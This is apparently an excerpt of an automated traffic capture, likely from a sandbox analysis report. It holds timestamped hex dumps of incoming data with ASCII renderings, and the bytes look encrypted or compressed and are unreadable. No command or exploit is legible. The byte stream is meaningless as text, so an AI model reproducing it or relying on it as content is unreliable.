                                                                                                                                                2022-09-29 12:51:33 UTC9781INData Raw: fb b5 a5 38 c2 9b 06 92 b5 47 da b1 0d 94 f8 4b 89 2f 2c eb 3f e6 b3 aa 72 fb 3a 29 9b f3 9f e0 a9 2d 68 4d ab 48 05 ce 9e 64 14 7a 13 c2 c4 3c 75 78 55 ad d4 d7 d3 af 65 8e d4 17 56 62 e5 e3 67 3d e0 d7 00 39 bc f0 ad f7 8b db 4f 7a d0 13 99 26 6a 10 38 ee e4 70 b0 af 9d 9a f5 81 78 51 16 e9 c0 e6 56 01 ea e4 d8 f4 61 d4 04 61 7c c7 73 28 5d 2b 32 5c 9f 6b fc 63 90 ac a4 27 e1 12 63 56 84 cb 6f 0c 81 c1 96 56 b3 84 ef 06 68 12 b3 e0 d9 82 98 d6 3d 17 73 b5 46 3f 07 e2 a1 43 f5 1f 2e 5b 9b 53 58 49 f5 73 c6 ef 21 63 c7 0e 83 8e 6f d9 2e d7 e3 85 ca 40 a8 e8 57 29 6f 47 15 f2 fb 21 0c d2 f0 a0 55 d2 25 eb 28 32 ab ab ac 02 6f d2 b6 7f 0d e0 c0 17 d7 f6 96 02 89 cd 09 03 e1 5a 74 5d 68 94 95 72 d4 6c cf 5f 7a ce 6b a6 65 1d 48 46 f4 c4 82 97 56 9c ee 96 5e
                                                                                                                                                Data Ascii: 8GK/,?r:)-hMHdz<uxUeVbg=9Oz&j8pxQVaa|s(]+2\kc'cVoVh=sF?C.[SXIs!co.@W)oG!U%(2oZt]hrl_zkeHFV^
                                                                                                                                                2022-09-29 12:51:33 UTC9797INData Raw: 73 33 32 80 80 e6 6c 46 41 5e 6e 77 69 6b 07 2c 33 b5 bc 9c c4 f4 a5 8d c0 32 6e 66 de 90 6a 8e a5 27 5b c5 0a 54 41 5f 47 7b 44 44 c9 41 d1 95 42 65 cb b1 5a a4 53 fc 49 cd 5c 4f 33 0d 97 44 e9 a4 ac 39 c7 82 e7 4a d0 01 7e 2d c0 cd d2 e2 7a 86 5b c1 36 ca 2e 1c 33 92 81 bf ae 57 81 99 55 2c 6d 1c 40 06 da 3b 21 a1 01 ec 69 2e d0 b0 2a 08 90 d9 b1 b8 78 47 1e f6 52 42 e4 c4 9a 21 57 75 97 db 24 a7 d5 b8 8b 71 49 25 71 41 db 0d 85 0f 54 18 1c fd dc 94 23 b9 00 94 b4 5a f4 77 95 d6 7c 9d c2 c3 cb 2f 68 7b ed f6 fe 3b 30 91 6a 4f 4c 13 66 44 57 32 68 d9 09 89 36 0f 36 3e 2e 84 9d 99 a1 69 2b 6d 07 9f 8d c9 4a 61 0d 6b 6d 72 51 d5 13 7f a9 0a 2f 35 f7 ce 9e 81 d3 db bd 59 15 c8 60 73 3b 0f 00 0d dc a1 5b 68 cd 1b d0 f2 02 43 7d 27 af 09 d0 83 91 2c 05 05 ac
                                                                                                                                                Data Ascii: s32lFA^nwik,32nfj'[TA_G{DDABeZSI\O3D9J~-z[6.3WU,m@;!i.*xGRB!Wu$qI%qAT#Zw|/h{;0jOLfDW2h66>.i+mJakmrQ/5Y`s;[hC}',
                                                                                                                                                2022-09-29 12:51:33 UTC9813INData Raw: 05 88 d1 a4 09 31 f9 ec 11 3a 94 ab de 63 b9 89 78 4b 7c 61 45 4f 08 e2 2e c2 70 57 65 1e 9c ec ab 96 64 b4 f0 7b da 5d 15 53 43 34 42 a4 78 21 93 62 c8 0d 2a 1a 8a 5f df 04 fd 65 95 1d d8 9b e4 dc f8 0a 5e 8b 38 d1 8d 77 86 ce 3c fb b6 c1 db a7 62 80 66 ce 31 23 77 01 26 1f 87 13 6c 23 78 a5 55 cf ec a9 21 c7 ed 09 6d 36 95 27 48 0c d2 0a bc 90 58 db b3 43 61 26 93 5c 80 23 76 af 8b 39 0d b4 59 e8 18 35 50 9a a6 34 45 53 63 89 af 23 27 90 c2 d8 be ee d9 32 4e 8d 1a 6c d5 98 af c4 c1 5f 1f e8 74 67 e2 af dc 66 8e e4 6d 96 dd 5d 1f 0f ab 82 0c d9 51 a4 23 73 05 a6 58 18 b7 c2 b9 5f e7 2a 6f cc 35 28 0a 3f 94 a1 cc 53 de b5 24 8d 25 87 a4 16 ab a7 95 b1 d2 32 2c cd 4f d6 92 1c 28 f9 f2 3a 65 ab 5f 4e 0e 31 95 93 91 ab be be ee ab 7c 21 f9 dd d8 32 fd 2d 7b
                                                                                                                                                Data Ascii: 1:cxK|aEO.pWed{]SC4Bx!b*_e^8w<bf1#w&l#xU!m6'HXCa&\#v9Y5P4ESc#'2Nl_tgfm]Q#sX_*o5(?S$%2,O(:e_N1|!2-{
                                                                                                                                                2022-09-29 12:51:33 UTC9829INData Raw: f5 f9 02 c9 09 c8 68 64 cf 10 4c bf 0c 90 e8 a2 38 03 21 63 46 8b f8 d0 dd c7 7b 80 7c d2 98 fd 10 32 d0 9a 46 3d ce fd a4 47 72 6f a6 8a 14 02 b2 49 d0 5a 42 c4 f4 59 36 43 03 8b fa 4d 3b 27 ba d3 54 dd d0 e5 df 97 a6 08 ec 0f b3 f6 bc 3e d8 98 b7 d1 fe 83 46 53 93 25 8e 50 32 7e 3c 7a 7e 5e 09 f7 62 20 03 04 20 9b 7b 2c 41 88 14 62 1e 17 fd bc f5 8b 03 ac 01 22 28 bf ba ed e3 fc 7c 05 c1 88 34 6a 64 28 9d 92 27 00 91 07 7e 78 d6 61 fa 51 28 2f ac 4c fd 55 f6 6a b2 44 6d 9f 0d ee 76 f3 8e e8 18 e6 5b 9a 30 5b 6e 14 b3 87 62 cc a3 94 87 15 0c d8 21 1a d2 76 94 dc f9 38 53 23 f9 54 66 c3 19 d3 5d f6 d1 e0 e3 4b 7f 1b 9b 2a e1 31 29 80 a2 78 90 e7 e3 3f e4 d7 e5 22 b4 dd 4d 34 39 1a b9 d7 a3 1f 4a 7d 45 38 91 19 56 08 12 24 bb 55 7f 05 61 af ad 97 74 cc 1a
                                                                                                                                                Data Ascii: hdL8!cF{|2F=GroIZBY6CM;'T>FS%P2~<z~^b {,Ab"(|4jd('~xaQ(/LUjDmv[0[nb!v8S#Tf]K*1)x?"M49J}E8V$Uat
                                                                                                                                                2022-09-29 12:51:33 UTC9845INData Raw: 67 62 3a f3 4e cb b0 1a a5 bd 00 71 16 a3 fa 67 de 84 07 ec d0 17 a8 3a 88 bb 5c 86 09 d3 a3 9c 85 2c 13 00 36 66 e9 f8 e6 df 76 d8 2c c2 90 ce 7f db d7 cf 21 82 e4 cd 91 cc eb 71 91 06 d9 24 8e f4 7a 19 a6 77 84 24 36 46 01 30 6b 9e 63 55 37 cd 6e 5a 11 6b e4 25 0b a8 7d 45 de 55 9d de e5 18 4e a6 58 da 20 d4 a7 b6 f7 76 b6 f9 77 a6 a2 67 35 53 eb 8f 26 47 eb 29 1f 92 67 69 30 4b 57 1b 77 c8 77 8f 8f 81 bd f1 11 12 f9 ad 2f e0 f4 df 44 4a 55 83 1c a1 fa 68 6f bd 3c 09 2c 36 fb 06 f5 a8 ea 2f 15 57 c7 03 e2 38 47 f2 ce 36 09 8c a8 4c a0 6f 1b 32 00 8c 76 39 01 2d a0 cf 5f b6 25 5e 63 d6 83 0a 1b a5 d3 06 43 b2 3c 7b d3 ab 18 5d 6c 9f 8a e1 ed 8d 98 ae f4 89 b2 1f 9b 96 bf e1 55 fa 0a 64 0b a0 f7 87 71 92 ac 14 3b 79 71 64 89 d0 39 22 b0 cb 8a 25 46 f2 25
                                                                                                                                                Data Ascii: gb:Nqg:\,6fv,!q$zw$6F0kcU7nZk%}EUNX vwg5S&G)gi0KWww/DJUho<,6/W8G6Lo2v9-_%^cC<{]lUdq;yqd9"%F%
                                                                                                                                                2022-09-29 12:51:33 UTC9861INData Raw: d9 7f c4 88 4c 88 16 e3 0c 7e 54 fa b0 35 64 58 62 f4 42 f1 6e f9 52 c1 ea 50 39 f9 32 0d 95 1f ae bd fa c1 3a 5e 3f bd e0 3a e6 dc c9 af 9f 1b 59 2c 2a 8b 43 29 ae 37 3c ec 0a aa f0 79 05 c0 d9 b5 c8 24 48 6c e8 49 13 4d 35 eb 53 7e 68 7a 7b 19 19 b6 b3 dd d3 3a 5c 81 f1 4c aa 8b 23 97 23 ce 43 31 c1 63 ee 95 50 42 a4 41 12 17 90 63 26 60 ea 95 0b 2c ec 66 57 f6 71 62 ce 6d fe 87 2e b3 35 91 09 de a1 60 b7 a0 a6 db a7 7f 07 d5 80 0f 27 f6 94 a0 ed 8d 60 bb ad ad 32 4d 71 5f 2e a7 ea b8 c4 43 f3 cd 1b 61 a2 6b 49 27 99 24 96 a5 00 bd fe cb 3c bf f8 1a e1 a2 a8 73 a8 f5 c8 20 60 ac 43 84 ed d7 1b 14 3a 66 c8 2a e4 38 ba ca 9e 65 d5 6c f0 a0 81 ea 57 a2 4b f5 a8 d5 27 3f 67 cd 40 67 79 16 b1 a3 da 7d 45 e7 e4 9d 9c f8 79 1a 7c 84 e0 68 8c d4 6e 94 cf c5 db
                                                                                                                                                Data Ascii: L~T5dXbBnRP92:^?:Y,*C)7<y$HlIM5S~hz{:\L##C1cPBAc&`,fWqbm.5`'`2Mq_.CakI'$<s `C:f*8elWK'?g@gy}Ey|hn
                                                                                                                                                2022-09-29 12:51:33 UTC9877INData Raw: 73 cf f2 e3 06 23 c0 59 14 d4 d7 c6 05 d3 8d 9b 28 3f 6e be d5 1a d9 c1 c3 14 8e 2d 33 18 89 86 0c cc 46 43 5a 0a f4 3f 6a 4a ab b5 c8 40 fe 44 55 da 95 c0 6e 08 d3 df 7e ab 33 10 2d a5 87 1a 25 5f 26 08 a6 dc 9e 63 c6 43 69 64 dd 06 76 9e ea 3f 3d f9 7b c5 64 0c e4 f1 99 fb 72 2d 0a 5e 70 81 89 05 59 9e a4 5b 3d 58 67 9a 2d cb 7c c1 1c bb 23 35 61 76 d8 ba 4a 9a cf 53 cd a9 2f ce b1 96 e6 c2 5c 8b a5 b7 95 09 95 29 86 e0 d2 16 90 3b bb 56 5b 76 25 ab 28 56 c1 92 e2 bf 47 be 39 fb 38 47 6f 61 42 1f e6 59 e8 c0 7c 6b f0 7e df db 3d 6d 76 9a e5 8d ee 5b 74 7e 1e 8f 64 49 57 0b bd 83 65 43 15 ce 46 da bf ed 25 e8 02 f1 58 4b 6d b9 58 c6 8f bd a7 78 c6 92 df 31 a0 78 1d bc 61 f7 52 ed 59 ed 20 20 51 be 97 01 4e 0b d6 19 79 e4 29 a4 8e 95 80 db a4 ea 62 0d f2
                                                                                                                                                Data Ascii: s#Y(?n-3FCZ?jJ@DUn~3-%_&cCidv?={dr-^pY[=Xg-|#5avJS/\);V[v%(VG98GoaBY|k~=mv[t~dIWeCF%XKmXx1xaRY QNy)b
                                                                                                                                                2022-09-29 12:51:33 UTC9893INData Raw: 85 fd 90 d6 1a fa 0f 6b 09 37 56 3c 35 13 f8 91 32 73 a8 7c 7f 79 a4 b1 7c 3d b6 d4 b6 f0 70 c1 88 6d 90 3c 1f a1 cc 25 64 25 f8 dc 78 d2 74 21 6f 2e 3f cd 87 00 13 b0 85 62 66 f4 80 6f eb 25 55 17 37 51 2b bc 22 fb 65 ac 00 b1 63 94 0c 27 c4 47 c7 28 00 71 58 d3 77 c4 be c6 a9 e9 96 1f c5 e3 ca 04 db 39 e7 53 08 c1 93 84 f5 4b ca e0 70 93 43 fb 9e 14 b6 9a 85 6b fa 9f d8 54 6b 84 58 b4 4b 35 95 4f aa 34 09 df 6b 25 1f 6e 06 be 3a 5c 74 2d 83 cd 08 12 06 49 84 af f9 ed ac 86 25 11 a4 ad 5b d0 c7 f6 03 0e f3 d5 c0 26 60 c0 c8 1f 10 02 1b 20 7d fa 4f 47 95 1f 99 10 88 84 67 33 c4 aa 49 33 29 4d 86 16 a7 90 4f 13 b8 5e eb 1b 6e e7 ae 59 a3 40 ad 30 96 aa f1 34 1b 9e 9d a9 64 92 07 d1 96 b3 1d 0c b5 a2 f9 5e f9 f0 4d 4d aa e5 4c 6a 2a 19 95 ab af 07 f0 8d 79
                                                                                                                                                Data Ascii: k7V<52s|y|=pm<%d%xt!o.?bfo%U7Q+"ec'G(qXw9SKpCkTkXK5O4k%n:\t-I%[&` }OGg3I3)MO^nY@04d^MMLj*y
                                                                                                                                                2022-09-29 12:51:33 UTC9909INData Raw: 54 09 75 ef 5f 02 04 59 6e b4 38 36 05 32 53 a7 ef 1a fd 11 df d6 c8 24 90 b8 6c 56 66 5c 44 eb bb ab 69 06 d8 02 09 1e 32 30 a1 48 53 66 e5 3e b0 ad 59 e3 77 aa 71 85 45 81 eb 36 d4 54 ec 30 1c d9 ae d7 60 0e 24 28 44 e2 1b 00 03 77 64 58 25 65 6c 59 1d 4e 7f 9e b2 75 b7 87 3e 11 59 d3 5d e7 ee cb c0 a7 98 6e 7b e0 f3 dd be 72 44 63 00 26 f0 ea d4 c6 d2 90 0e 21 85 1a ed 07 88 a2 54 3e 34 77 ea 94 29 d3 00 b1 36 49 ad 4e 8c 96 d4 ff 2c 60 3c 96 82 c0 39 61 fd 47 18 8c 60 c1 ab 2a f9 96 89 06 4c 2d d0 da 34 39 23 d7 34 55 43 ff 7e 91 80 f8 38 af d3 37 56 80 47 52 e2 c9 0d 6a 1f af bb 59 a3 0a 45 ff 30 6d 9d fa f5 a4 46 8e 88 35 38 5c 7d a6 8d d3 cb 31 cd d4 47 01 53 07 bc a0 b1 ad 5b 81 ea a2 16 70 ab 97 b8 91 6a f9 46 62 92 e7 3c 1c 34 28 df c0 f2 18 5e
                                                                                                                                                Data Ascii: Tu_Yn862S$lVf\Di20HSf>YwqE6T0`$(DwdX%elYNu>Y]n{rDc&!T>4w)6IN,`<9aG`*L-49#4UC~87VGRjYE0mF58\}1GS[pjFb<4(^
                                                                                                                                                2022-09-29 12:51:33 UTC9925INData Raw: fe 4f 4e bf 69 a6 58 19 fd 7c 45 7e 13 c2 b5 a0 bc 16 16 cf 2a 36 06 13 e5 9f 62 93 2f 1a 38 9d 49 8f e8 70 d2 fd 4b 7a d1 3c b6 c9 c1 3d 85 db 6f a0 68 1e 23 0b 00 20 c0 6b ee f5 0b 66 12 98 77 0a c0 24 64 e6 ac 6b a3 4b 9b e8 9e 7a a5 45 2f 86 f7 fa ea 6b 59 e5 65 95 0c 9d 1c 10 f7 c0 d6 fa d4 02 4b 8b e9 7b 72 2c b0 68 f4 af b9 ac d4 80 8d 22 86 97 a1 7d 09 2d 10 63 8d 91 31 dc d6 55 58 7b 63 a5 9a 3d fb 08 85 d5 ae c6 67 0a 53 4b 16 60 af 74 55 c5 e0 fa 6c 6c 98 c3 59 e4 58 57 f4 9b 8c 5b cf 52 55 0f 1d 26 1c 4b b2 c1 48 23 6b e8 c5 35 70 d6 93 38 96 09 3e 2f 8a 68 38 d0 c4 4b 3d 1f 24 b6 bf 95 36 ad fd c5 5f 5d 59 82 8e 2a b0 2f 50 9d 3d 3f 15 cb fe f4 24 94 41 ba 68 6e e5 bb a9 5a a0 0a 1e 6b e4 32 a4 85 f5 53 8a 63 4b 4c 53 3f 93 87 0d 7f 82 37 0c
                                                                                                                                                Data Ascii: ONiX|E~*6b/8IpKz<=oh# kfw$dkKzE/kYeK{r,h"}-c1UX{c=gSK`tUllYXW[RU&KH#k5p8>/h8K=$6_]Y*/P=?$AhnZk2ScKLS?7
                                                                                                                                                2022-09-29 12:51:33 UTC9941INData Raw: 96 67 a9 b9 9c bb 87 77 3b 87 07 f4 8a b4 69 01 9c dc b4 92 4c 8f c5 30 d7 d7 b2 bd 0c 36 d3 34 1a 11 95 2f ae 20 24 eb 03 1d 32 77 09 22 2e 1c 21 48 52 30 ba ae 02 05 f0 60 33 70 4b 26 58 39 56 d9 73 48 6a be 9f bf 61 d6 c9 44 c5 49 bb 95 73 4d 8b a5 8e fa c6 46 94 08 64 c9 5c 16 78 89 ef 2b 03 d9 48 97 76 3f f5 4e 39 f7 88 f9 22 5c b6 cd e0 c7 c4 56 f1 2d 51 aa e2 db e6 e7 a0 54 52 6d e2 f4 e8 9a 2b 99 e6 39 b5 98 98 e8 d3 da b0 01 5c 31 29 b5 6b b1 ab f4 68 0a 61 0b 37 82 bf 6a cf cf 7e 9a db ef 73 ef 6c 4c 90 5c 1c 9a 11 83 02 67 0c 9e 4a ff d9 26 65 33 ed 07 83 6d 5f ea 14 09 7f 9c 92 fa 16 71 ba 6c 5a ce 6e f1 84 6d 5d d8 38 d7 82 ba 28 cd 5a d2 9a 38 8c 23 b4 f7 4e 44 3a 29 8b fe 26 98 d5 fe 56 95 88 56 27 3d 98 08 17 44 2f 01 f7 bd d8 20 8e 65 53
                                                                                                                                                Data Ascii: gw;iL064/ $2w".!HR0`3pK&X9VsHjaDIsMFd\x+Hv?N9"\V-QTRm+9\1)kha7j~slL\gJ&e3m_qlZnm]8(Z8#ND:)&VV'=D/ eS
                                                                                                                                                2022-09-29 12:51:33 UTC9957INData Raw: c7 55 c2 1b 7c 1a fa d3 b6 07 07 d3 39 ab b9 7b 64 e5 10 a9 1a cd 7c 77 c1 a3 6d 7a 36 0a 2a c6 bc 60 79 cb e7 5d f7 52 1a 07 fc eb 48 4c da bd 5d 0b 52 b8 16 b7 55 85 a6 df 04 e4 9e c5 3f 18 31 5e 02 90 0e 9a 86 ab 31 cc 68 55 5d 11 88 63 ba 51 f3 ae c2 db ad b4 15 73 1e fa 42 a4 c1 14 31 e0 6f 69 e6 43 bf 1e d8 0f 9d 3e 2d 40 94 04 e8 4a 12 8c 3c e5 d1 85 96 99 e8 41 54 fb 31 c2 4d 57 53 a3 c4 69 95 62 f4 98 40 c7 76 63 63 30 47 a5 65 ed 7f 47 99 f0 e5 d5 66 e0 41 a6 97 d2 e3 b5 3e 0e 7c a1 d5 2c 85 80 7b 71 f7 63 1e b7 5c 8b af 5e 2f fe ad dd 6c 60 0d 78 7f 3f a8 74 c8 3b 1b c5 58 09 0e a9 e4 9c f3 a3 5e ad 73 9f 3b 8b 88 3f af 90 75 24 d4 3f 5d 8a aa 9b 47 68 0b d2 0e 93 5d 0f 38 b4 c6 53 5a 7d c3 ec b3 ea 94 b5 35 05 c1 8b b5 85 d4 1e 8c 91 71 b7 76
                                                                                                                                                Data Ascii: U|9{d|wmz6*`y]RHL]RU?1^1hU]cQsB1oiC>-@J<AT1MWSib@vcc0GeGfA>|,{qc\^/l`x?t;X^s;?u$?]Gh]8SZ}5qv
                                                                                                                                                2022-09-29 12:51:33 UTC9973INData Raw: 88 a9 d0 cc 7f 31 a9 cc 02 4f f4 2b 79 57 04 41 b3 27 a2 0b d9 21 d7 07 40 ad 1e a9 1e 69 6d ee 9f 49 09 98 46 a6 7b 2b 83 63 19 1d 13 55 9f e9 03 55 ee 4d 63 97 6e 9d b6 b1 2d bf 7d 65 bc a4 b2 bc 82 67 f4 99 36 43 44 8d 4c 7d 38 cf ba e9 de db 0d d9 b8 a6 14 00 f8 6a 05 7a 50 60 13 b2 af 80 ea 9a da 11 9e 2a bd 2a 21 ef 01 41 4a a1 3b bb 91 27 87 8e 09 38 bb 3b 55 2f db af 98 ef 7e de 36 49 96 fe 74 77 bf 60 46 f9 35 a2 fb 10 7d 62 5a 5c d4 a0 ee 46 83 55 c9 c4 0e cf c8 8e b7 59 aa 54 f3 87 63 46 f5 25 ce b5 7e 0b b1 4a 91 68 b7 86 ed 09 9a b7 78 86 89 c2 07 33 83 dc 46 ae 90 09 32 90 d0 de e6 48 ca 24 0f e3 72 45 6b d3 fd 0e ab 9c 43 95 c8 eb aa e7 94 cf 08 a5 74 8e 1c e4 2c 1d d4 33 33 73 39 29 a2 be 8a cc 9d f7 5f 6e 2a c1 d9 fd 91 52 47 3f 6d b1 1c
                                                                                                                                                Data Ascii: 1O+yWA'!@imIF{+cUUMcn-}eg6CDL}8jzP`**!AJ;'8;U/~6Itw`F5}bZ\FUYTcF%~Jhx3F2H$rEkCt,33s9)_n*RG?m
                                                                                                                                                2022-09-29 12:51:33 UTC9989INData Raw: f2 29 3a 21 ae d6 f9 a6 2d 6b c0 90 5b 3c 4d 1c a5 5b 08 9e a2 61 8d f4 fa e9 92 6b fa 69 ec 5e d9 78 cd db b3 90 4e 9f b3 07 d0 9c b8 e3 eb 09 6c 3a fc a0 57 0b ce e1 77 da 1a 09 f4 3b ea 47 4c b5 f7 e0 22 f2 3c 7f df b8 06 b4 9e dd 88 59 7d 67 cf cf 06 36 0f 83 56 d5 9f 3a 9d f8 33 0f ad 10 74 26 66 13 b1 53 c6 05 6c 21 aa 46 63 f7 81 45 db fd 46 3e 29 3c 7f 0c 51 18 93 85 d9 4e b3 4d de ba 97 11 02 99 db c3 66 1c 11 cb 8b fc 4a ef ef 38 76 04 78 b6 be c0 9d 2a 11 dc 01 80 e1 0d 38 67 fa 3e af 7e 0e ea 91 16 9d 09 79 08 db 71 eb d5 21 74 08 bc e1 eb a6 06 3a 6b 0a 36 b2 ab d2 62 9c 3e da d5 09 1f b2 48 86 5c be 83 dc f0 07 95 ba 23 a5 a6 1f 0d 5c ae cb fc 55 ec ee 9e 67 4b da 79 f5 db e4 32 ff 9f c8 a7 24 b8 5d fe 6c 00 8a 80 10 84 3c a1 34 3c ea e4 6f
                                                                                                                                                Data Ascii: ):!-k[<M[aki^xNl:Ww;GL"<Y}g6V:3t&fSl!FcEF>)<QNMfJ8vx*8g>~yq!t:k6b>H\#\UgKy2$]l<4<o
                                                                                                                                                2022-09-29 12:51:33 UTC10005INData Raw: 86 ac f5 72 a7 bf f4 80 b1 fe d7 62 19 36 09 f5 3a 0b 53 d1 c2 b3 ab 23 5f bf 28 8e 9a 94 71 eb 16 fe ab ef f0 7c f6 1e fb fe 00 62 cd b8 7d 9d 10 87 33 09 34 2c c0 f0 a9 45 58 d0 30 e4 17 be bc c8 ce c9 c9 bb 44 be 98 e0 04 35 57 61 52 8d b6 77 de 59 64 6e c0 ae 80 7c 79 dd c1 ed d8 de 16 b4 04 2e 3d 30 ea bb a8 1f 07 78 76 78 62 fa e8 e5 3b 1d 84 c0 96 9d bc ef 8d 1f 13 f1 e8 e8 2e 5a 71 ce 9b 65 9e ff 15 cf 9f 1e 66 0d da 26 2b 4c a6 e3 5b c4 d3 d4 69 83 20 ec ab f3 fa 93 64 4d 2b 27 83 34 01 52 50 61 7a a1 09 d5 b9 9f 79 b4 79 cd 8b 9a bc 5e 2e 4a 23 84 60 3a ca b4 03 2a 01 1f 10 f3 6a 26 90 67 d3 2f 58 85 66 8a 25 36 c3 3e 85 c8 93 51 68 a1 2b 1f 98 8e 81 13 76 f3 94 3c c8 8b b3 19 18 21 5b 4c fb 16 93 6d 51 5d e7 e2 e2 a4 4d 0f 93 25 83 cd cf 24 c7
                                                                                                                                                Data Ascii: rb6:S#_(q|b}34,EX0D5WaRwYdn|y.=0xvxb;.Zqef&+L[i dM+'4RPazyy^.J#`:*j&g/Xf%6>Qh+v<![LmQ]M%$
                                                                                                                                                2022-09-29 12:51:33 UTC10021INData Raw: 14 af c7 a0 3d e5 78 7f 88 1b 74 12 d7 e6 d7 91 a1 1d bb 3b e1 8e 79 45 fd 57 a7 e2 ff e6 94 fb c2 03 52 24 ba ab 51 79 fd b4 26 d7 d1 6d 0f 45 c9 96 ff 57 3c 2c b6 ae 24 43 0c b7 04 84 96 8d 3b 54 fd 17 a2 cb 88 dd 15 61 71 79 4b 70 ab ac dc 05 90 fa 8e be c9 e6 b3 bc aa 7c 46 04 cb d8 dc 35 84 9b 4a 5a 3e a2 3f f8 44 10 21 2c b9 2c b5 ee 98 db 25 e2 b2 04 6f c1 0e 18 f3 24 df f3 0b b8 81 10 ff 36 da 02 cf b8 37 a6 8b f6 a2 1b e2 19 eb c0 63 14 f3 d6 17 e9 d6 12 b6 16 cf 66 15 7f 09 25 da 20 91 f8 51 26 5f f3 82 ff 71 8f cd 58 9f 75 f4 c4 a9 28 f2 2e e9 b2 4f f9 c3 bd f5 f9 1b 30 49 2a 62 c7 f8 c6 0e 80 c9 47 27 56 bd 3a d4 93 cf 4a 1a f5 34 df 21 fc 93 83 ef c0 76 7c ff a7 8f 03 75 07 e1 62 92 6e 7f b9 40 09 13 4c f9 8a 95 dc bf 3f 27 ab 3b 7b 43 94 30
                                                                                                                                                Data Ascii: =xt;yEWR$Qy&mEW<,$C;TaqyKp|F5JZ>?D!,,%o$67cf% Q&_qXu(.O0I*bG'V:J4!v|ubn@L?';{C0
                                                                                                                                                2022-09-29 12:51:33 UTC10037INData Raw: a8 59 87 9d 4b c1 05 cd f6 99 9c c7 83 8f a6 48 81 08 77 52 b8 05 45 39 c4 49 62 ba 68 6e b7 1d a9 7a ec b4 4c b4 38 32 a1 84 d1 fd 58 cf eb 0c a0 4d 00 35 82 1f 57 c8 a8 e1 3a a5 d9 ae f3 0b 66 a5 8b cb e7 68 be 8a 78 58 3b 98 bb 80 3d 68 b7 c4 15 c4 4e c1 cd 71 98 16 3e 8a 90 4f 55 b9 ea c3 e9 5a ee eb 6b 61 fa 2c 4a a3 11 ac 3b 5b b2 65 57 a0 e3 70 e3 06 5f 82 9d af 29 11 43 f6 86 48 cb 5a a0 9d c7 da 55 33 27 84 32 63 b6 96 01 a7 c9 e6 f3 40 de 83 d3 f6 15 d5 8f e1 e3 d2 4c 19 3a d7 d5 3b b7 a5 fa f6 d9 57 e1 1e a8 d7 3d a7 d0 8c 2c db 27 ea 30 19 16 f4 17 3e 9a c2 61 3d cb 78 9b a0 c3 fd 4c 73 4a 40 0c de 4c e4 a1 83 ae 2a e0 fc f4 ba 9b 17 64 c3 56 67 9e e0 ea 8d 89 79 04 5f 0d 23 e8 81 e2 bc c7 88 c1 38 11 c7 b2 ee f3 60 37 0a 50 b2 e1 3a 60 d9 6c
                                                                                                                                                Data Ascii: YKHwRE9IbhnzL82XM5W:fhxX;=hNq>OUZka,J;[eWp_)CHZU3'2c@L:;W=,'0>a=xLsJ@L*dVgy_#8`7P:`l
                                                                                                                                                2022-09-29 12:51:33 UTC10053INData Raw: 91 54 f8 91 48 d4 d9 a0 29 e8 22 b6 df 54 d1 ed ea f7 e7 a8 1d a4 35 df cd 64 74 85 fb 6a 28 c6 7a c7 0d d7 69 4a d4 29 83 95 64 29 79 d9 64 fa bd 78 7a 32 ca d0 3e 15 3d 6c 5c 22 e3 2c 08 26 b9 9d 5d 03 d2 52 1d 52 e8 e4 b5 74 da d9 05 eb 38 95 33 b5 35 d6 d8 93 5f 84 d4 82 8e 7f fa c8 c1 05 a3 4f bb ea b9 8a 05 2f 38 b2 92 cd 57 f3 c8 0d 17 eb b8 4b c3 39 7d a9 cf d9 42 21 59 22 58 f4 35 6e e9 4c ba 82 16 c7 a6 b8 64 c2 d6 63 31 c8 cd 1f ea a0 cd 27 df bd 0f 92 a9 36 60 21 49 21 27 5e 3a c8 bb 54 85 c6 08 84 94 2e 0c 42 59 0d 7f ab b0 45 6d 0d e3 92 26 d3 ce 8c 2d 12 38 2e 5b 20 1f eb e7 ef 31 56 8a 04 74 31 04 94 c8 31 68 c9 5e 15 11 6e c8 7d ff 7b 88 a6 6e 7d f7 35 09 95 92 e3 57 11 96 8f 4d 98 ca ef af db f2 12 40 68 bb 1d c6 bc 0a 1b 24 ee 4f 55 68
                                                                                                                                                Data Ascii: TH)"T5dtj(ziJ)d)ydxz2>=l\",&]RRt835_O/8WK9}B!Y"X5nLdc1'6`!I!'^:T.BYEm&-8.[ 1Vt11h^n}{n}5WM@h$OUh
                                                                                                                                                2022-09-29 12:51:33 UTC10069INData Raw: e6 ff 93 49 50 af ba 3e b1 f1 40 38 31 8f 8b ec f0 07 5f 0a 38 ae 49 32 ac 5d c7 27 4a 38 01 42 47 bc a4 bb c5 82 f7 10 6f da 3e c9 09 c5 35 e3 cb a4 8d b0 71 d1 45 f0 1a 50 78 54 21 b1 46 63 42 c4 fa c6 34 45 9d 49 3a a6 5e 15 7d 47 fb 44 51 a1 db f6 68 fe 44 44 d3 4b 4f 21 b7 c8 c4 0a d4 a1 56 a4 05 76 65 fa 19 95 63 ba 79 30 3d b3 cb 02 df 61 95 32 9d 97 dc b0 b9 9b ff d3 53 7d d3 5d a9 e0 68 27 ef c5 56 a2 68 11 f3 79 4d cd 47 c1 a5 4a f6 04 b6 2d 02 c3 a0 ce ba 0e 0c c9 ab f5 39 49 53 22 18 4b 6c f7 e2 ef a8 70 30 ab 84 29 60 a5 f7 57 62 f0 ca f3 d2 27 39 f8 63 e7 7c 7e 7c 94 84 5d 9e e4 fe 92 39 32 51 78 e6 2f 11 2d 22 61 ec d7 07 40 71 f5 5b e0 d9 1b da 38 d5 6b 3e c7 b0 a6 5c f7 12 17 4a 6e 0a bb b1 2f 8c 00 c9 56 d9 11 26 d9 e6 51 fd 66 82 e8 ce
                                                                                                                                                Data Ascii: IP>@81_8I2]'J8BGo>5qEPxT!FcB4EI:^}GDQhDDKO!Vvecy0=a2S}]h'VhyMGJ-9IS"Klp0)`Wb'9c|~|]92Qx/-"a@q[8k>\Jn/V&Qf
